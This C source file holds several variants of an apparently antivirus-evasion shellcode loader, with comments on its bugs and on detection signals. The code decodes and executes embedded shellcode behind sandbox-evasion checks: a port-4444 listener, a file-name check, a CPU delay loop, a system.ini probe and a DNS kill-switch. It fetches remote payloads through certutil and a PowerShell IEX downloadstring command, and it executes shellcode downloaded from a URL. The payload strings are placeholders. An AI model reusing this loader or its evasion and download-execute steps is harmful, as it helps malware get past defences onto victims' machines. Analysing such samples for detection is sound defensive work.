/*
 * main: minimal variant of the loader harness.  It hands the embedded byte
 * string to decode_shellcode() and executes whatever comes back.  argc and
 * argv are unused.
 *
 * Notes on the code as written (unchanged here):
 *  - `size` is sizeof(buffer), so it includes the terminating '\0' of the
 *    string literal.
 *  - `shellcode` is passed to decode_shellcode() uninitialised and then
 *    overwritten by the return value; what the callee does with its second
 *    argument is not visible on this page.
 *  - There is no return statement (implicitly 0 since C99).
 */
int main (int argc, char **argv) {
    unsigned char *shellcode;
    unsigned char buffer[]="the encoded shellcode here"; /* literal is placeholder text */
    int size = sizeof(buffer);
    shellcode = decode_shellcode(buffer,shellcode,size);
    exec_shellcode(shellcode);
}
/*
 * main: network-gated variant of the loader harness.  It opens a listening
 * TCP socket on port 4444 bound to all interfaces, blocks until one client
 * connects, sends a fixed greeting, tears the socket down, and only then
 * decodes and executes the embedded byte string.  argc and argv are unused.
 *
 * Notes on the code as written (unchanged here):
 *  - Return values of listen(), send() and shutdown() are ignored.
 *  - The accept() loop spins until a connection is obtained; with no client
 *    the code after the loop is never reached.
 *  - `Socket` is overwritten by the accepted handle, so the listening socket
 *    itself is never closed.
 *  - `shellcode` is passed to decode_shellcode() uninitialised; there is no
 *    return statement on the final path (implicitly 0 since C99).
 * Detection angle: an unexpected listener on 4444 followed by the constant
 * "Welcome to the server!" banner is the observable host/network signal.
 */
int main (int argc, char **argv) {
    //unsigned char *buffer;
    unsigned char *shellcode;
    unsigned char buffer[]= "encrypted shellcode"; /* literal is placeholder text */
    WSADATA WsaDat;
    if(WSAStartup(MAKEWORD(2,2),&WsaDat)!=0) {
        WSACleanup();
        return 0;
    }
    SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(Socket==INVALID_SOCKET) {
        WSACleanup();
        return 0;
    }
    SOCKADDR_IN serverInf;
    serverInf.sin_family=AF_INET;
    serverInf.sin_addr.s_addr=INADDR_ANY;   /* every local interface */
    serverInf.sin_port=htons(4444);
    if(bind(Socket,(SOCKADDR*)(&serverInf),sizeof(serverInf))==SOCKET_ERROR) {
        WSACleanup();
        return 0;
    }
    listen(Socket,1);                        /* result not checked */
    SOCKET TempSock=SOCKET_ERROR;
    while(TempSock==SOCKET_ERROR) {          /* busy-retries accept() until a peer arrives */
        TempSock=accept(Socket,NULL,NULL);
    }
    Socket=TempSock;                         /* listening handle lost here */
    char *szMessage="Welcome to the server!\r\n";
    send(Socket,szMessage,strlen(szMessage),0);
    shutdown(Socket,SD_SEND);
    closesocket(Socket);
    WSACleanup();
    int size = sizeof(buffer);               /* includes the literal's '\0' */
    shellcode = decode_shellcode(buffer,shellcode,size);
    exec_shellcode(shellcode);
}
/*
 * main: name-gated variant of the loader harness.  The embedded byte string
 * is decoded and executed only when argv[0] contains "strstr.exe"; under any
 * other name the function does nothing.
 *
 * Notes on the code as written (unchanged here):
 *  - strstr() returns a pointer; comparing it with `> 0` is a pointer/
 *    integer comparison that compilers warn about -- the intent reads as a
 *    non-NULL check.
 *  - argv[0] is whatever the launcher supplied; it is not guaranteed to be
 *    the executable's path.
 *  - `size` includes the literal's terminating '\0'; `shellcode` is passed
 *    to decode_shellcode() uninitialised; no return statement (implicitly 0
 *    since C99).
 * Detection angle: behaviour that depends on the binary's own file name is
 * itself a signal; a renamed copy of this sample stays inert, so analysis
 * runs should preserve the original name.
 */
int main (int argc, char **argv) {
    unsigned char *shellcode;
    unsigned char buffer[]= "strstr.c"; /* literal is placeholder text */
    if(strstr(argv[0], "strstr.exe") > 0) {   /* pointer compared against 0 */
        int size = sizeof(buffer);
        shellcode = decode_shellcode(buffer,shellcode,size);
        exec_shellcode(shellcode);
    }
}
/*
 * main: event-log-probe variant of the loader harness.  It calls
 * OpenEventLog(NULL, "Application") and then decodes and executes the
 * embedded byte string regardless of the outcome -- a NULL handle only
 * prints "error".  argc and argv are unused.
 *
 * Notes on the code as written (unchanged here):
 *  - The handle `h` is never closed (no CloseEventLog).
 *  - The failure branch does not change control flow, so the probe has no
 *    effect on whether the payload runs.
 *  - `size` includes the literal's terminating '\0'; `shellcode` is passed
 *    to decode_shellcode() uninitialised; no return statement (implicitly 0
 *    since C99).
 * Detection angle: a process that opens the Application event log and then
 * never reads or closes it is an unusual API sequence worth a rule.
 */
int main (int argc, char **argv) {
    unsigned char *shellcode;
    unsigned char buffer[]= "encoded shellcode"; /* literal is placeholder text */
    HANDLE h;
    h = OpenEventLog( NULL, "Application");
    if (h == NULL) printf("error\n");   /* reported, not acted on */
    int size = sizeof(buffer);
    shellcode = decode_shellcode(buffer,shellcode,size);
    exec_shellcode(shellcode);
}
/*
 * main: delay variant of the loader harness.  It runs a 10,000 x 10,000
 * nested loop of cos()/sin() calls whose results are never read, then
 * decodes and executes the embedded byte string.  argc and argv are unused.
 *
 * Notes on the code as written (unchanged here):
 *  - `a`, `b`, `c`, `d` are written and never used; `int a=cos(x)` also
 *    truncates a double to int.  The loop's only effect is elapsed time.
 *  - `size` includes the literal's terminating '\0'; `shellcode` is passed
 *    to decode_shellcode() uninitialised; no return statement (implicitly 0
 *    since C99).
 * Detection angle: a burst of pure CPU work with no I/O immediately before
 * the payload is the behavioural signature of this variant.
 */
int main (int argc, char **argv) {
    //unsigned char *buffer;
    unsigned char *shellcode;
    unsigned char buffer[]= "encoded shellcode"; /* literal is placeholder text */
    int x,y;
    for (x=1; x<10000; x++) {
        for (y=1; y<10000; y++) {
            int a=cos(x);      /* results discarded */
            int b=cos(y);
            double c=sin(x);
            double d=sin(y);
        }
    }
    int size = sizeof(buffer);
    shellcode = decode_shellcode(buffer,shellcode,size);
    exec_shellcode(shellcode);
}
/*
 * main: build-time-configured loader harness.  Every capability is selected
 * by a preprocessor symbol (QUIET, SANDBOX_FOPEN, KVALUE, DOWNLOADCERTUTIL,
 * DOWNLOADPOWERSHELL, LVALUE, FVALUE, UVALUE, ENCRYPT, ASCIIMSF, X64,
 * DOWNLOADEXECSC, PRINT_DEBUG); with none defined the function only sets
 * fvalue/uvalue to NULL and returns 0.  The comment "compute #defines from
 * defs.h" indicates FVALUE/UVALUE are supplied by a header not shown here.
 *
 * Helpers called but defined elsewhere: get_filesize, load_textfile,
 * decode_shellcode, exec_shellcode, exec_shellcode_ASCIIMSF, exec_shellcode64,
 * ie_download, downloadshellcode.  Nothing on this page shows what they do
 * with their arguments or who owns the memory they return.
 *
 * Notes on the code as written (unchanged here):
 *  - argv[1] and argv[2] are read without any argc check.
 *  - sprintf() into download[500] has no bound and the formatted string is
 *    handed straight to system(), so the second argument is a shell command
 *    fragment supplied by whoever launches the binary.
 *  - malloc(strlen(X)) followed by strcpy(X) is one byte short for the
 *    terminator.  FVALUE and UVALUE each declare `int size` in the same
 *    scope, so defining both does not compile.
 *  - decode_shellcode() and ie_download() receive their output pointer
 *    uninitialised; `buffer`, `shellcode` and `buf` may be read before being
 *    set depending on which symbols are combined.
 *  - `shellcode = buf;` in the uvalue branch names a variable declared only
 *    inside the fvalue branch (and only under LVALUE), so that configuration
 *    cannot compile either.
 *  - `c` is never used; `index`/`opterr`/`optind` are getopt leftovers, but
 *    getopt itself is never called here.
 *  - `buffer = FVALUE;` assigns a string literal (it is also passed to
 *    strlen/strcpy) to an unsigned char *.
 * Detection angle: the constant command lines "certutil.exe -urlcache -split -f"
 * and "powershell.exe IEX ((new-object net.webclient).downloadstring(...))",
 * the fopen() probe of c:\windows\system.ini, and a gethostbyname() lookup
 * whose *success* makes the process exit(0) are all observable host-side
 * signals for this family of samples.
 */
int main (int argc, char **argv) {
#ifdef QUIET
    ShowWindow(GetConsoleWindow(), SW_HIDE);   /* hide the console window */
#endif
    char *fvalue = NULL;   /* path (LVALUE) or copied literal (FVALUE) of the payload */
    char *uvalue = NULL;   /* URL of the payload (UVALUE) */
    int index;
    int c;                 /* unused */
    opterr = 0;            /* getopt global; getopt() is not called in this function */
    // do evading here with fopen technique
#ifdef SANDBOX_FOPEN
#ifdef PRINT_DEBUG
    printf("use fopen sandbox escape\n");
#endif
    FILE *fp = fopen("c:\\windows\\system.ini", "rb");
    if (fp == NULL) return 0;   /* bail out when the file is absent */
    fclose(fp);
#endif
    //evading with gethostbyname technique
#ifdef KVALUE
#ifdef PRINT_DEBUG
    printf("use gethostbyname sandbox evasion\n");
#endif
    struct hostent *hp = gethostbyname(KVALUE);
    if (hp != NULL) exit(0);    /* a *successful* lookup ends the process */
#endif
    //#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL)
    //download a file and write to disk
#ifdef DOWNLOADCERTUTIL
    char download[500];
    //how not to do it...
    sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]);   /* unbounded; argv[2] unchecked */
#ifdef PRINT_DEBUG
    printf("url: %s\n", download);
#endif
    system(download);   /* shell command built from the command line */
#ifdef PRINT_DEBUG
    printf("download done\n");
#endif
#endif
#ifdef DOWNLOADPOWERSHELL
    char download[500];
    sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]);   /* unbounded; argv[2] unchecked */
#ifdef PRINT_DEBUG
    printf("url: %s\n", download);
#endif
    system(download);   /* shell command built from the command line */
#endif
#ifdef LVALUE
    fvalue=argv[1];     /* no argc check */
#endif
#ifdef PRINT_DEBUG
    printf ("fvalue = %s ", fvalue);
    printf ("uvalue = %s \n", uvalue);
    for (index = optind; index < argc; index++)
        printf ("Non-option argument %s\n", argv[index]);
#endif
    // compute #defines from defs.h
#ifdef FVALUE
    int size = strlen(FVALUE);
    fvalue=(char*)malloc(size);   /* one byte short of strlen+1 */
    strcpy(fvalue,FVALUE);
#endif
#ifdef UVALUE
    int size = strlen(UVALUE);    /* second `size` in this scope if FVALUE is also defined */
    uvalue=(char*)malloc(size);   /* one byte short of strlen+1 */
    strcpy(uvalue,UVALUE);
#endif
    // exec shellcode from a given file or from defs.h
    if (fvalue) {
        unsigned char *buffer;
        unsigned char *shellcode;
        int size;
        //#ifndef FVALUE
#ifdef LVALUE
#ifdef PRINT_DEBUG
        printf("exec shellcode from file\n");
#endif
        size = get_filesize(fvalue);
        buffer = load_textfile(fvalue, buffer, size);   /* buffer passed uninitialised */
#endif
#ifdef FVALUE
        size = strlen (FVALUE);
        buffer = FVALUE;   /* string literal into unsigned char * */
#endif
#ifdef ENCRYPT
#ifdef PRINT_DEBUG
        printf ("size %d\n",size);
        //printf ("%s\n",FVALUE);
        printf("exec shellcode with decode_shellcode\n");
#endif
        shellcode = decode_shellcode(buffer,shellcode,size);   /* shellcode passed uninitialised */
#endif
#ifndef ENCRYPT
#ifdef LVALUE
        unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l
#endif
#ifndef ASCIIMSF
#ifndef DOWNLOADEXECSC
#ifdef PRINT_DEBUG
        printf("exec shellcode without decode_shellcode\n");
#endif
        shellcode = buf;   /* `buf` exists only under LVALUE */
#endif
#endif
#endif
#ifndef X64
#ifndef ASCIIMSF
        exec_shellcode(shellcode);
#endif
#ifdef ASCIIMSF
        exec_shellcode_ASCIIMSF(shellcode);
#endif
#endif
#ifdef X64
        exec_shellcode64(shellcode);
#endif
    }
    // exec from url
#ifdef UVALUE
    else if (uvalue) {
#ifdef PRINT_DEBUG
        printf("exec shellcode from url\n");
#endif
        char *sh_filename;
        sh_filename = ie_download(uvalue, sh_filename);   /* sh_filename passed uninitialised */
        int x=strlen(sh_filename);
#ifdef PRINT_DEBUG
        printf("\n\n%d\n\n", x);
#endif
        unsigned char *buffer;
        unsigned char *shellcode;
        int size = get_filesize(sh_filename);
        buffer = load_textfile(sh_filename, buffer, size);   /* buffer passed uninitialised */
#ifdef ENCRYPT
        shellcode = decode_shellcode(buffer,shellcode,size);
#else
        shellcode = buf;   /* `buf` is not in scope here */
#endif
#ifndef X64
        exec_shellcode(shellcode);
#endif
#ifdef X64
        exec_shellcode64(shellcode);
#endif
    }
#endif
#ifdef DOWNLOADEXECSC
    unsigned char *shellcode = downloadshellcode(argv[1]);   /* no argc check */
#ifndef X64
    exec_shellcode(shellcode);
#endif
#ifdef X64
    exec_shellcode64(shellcode);
#endif
#endif
    return 0;
}